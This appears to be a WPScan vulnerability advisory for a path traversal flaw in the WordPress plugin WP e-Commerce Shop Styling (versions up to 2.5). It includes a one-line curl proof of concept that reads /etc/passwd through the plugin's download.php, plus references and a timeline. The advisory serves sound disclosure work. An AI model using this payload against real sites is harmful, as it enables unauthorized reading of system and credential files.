WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded.

You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

Affects

Plugin wp-ecommerce-shop-styling
fixed in version 2.6

References

PACKETSTORM 132594
URL http://www.vapid.dhs.org/advisory.php?v=136
URL https://plugins.trac.wordpress.org/changeset/1193456/wp-ecommerce-shop-styling
URL https://wordpress.org/support/topic/wp-e-commerce-shop-styling?replies=2
URL https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_ecommerce_shop_styling_file_read.rb

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 214
Verified No
WPVDB ID 8079

Timeline

Publicly Published 2015-07-05 (over 1 year ago)
Added 2015-07-06 (over 1 year ago)
Last Updated 2015-09-20 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.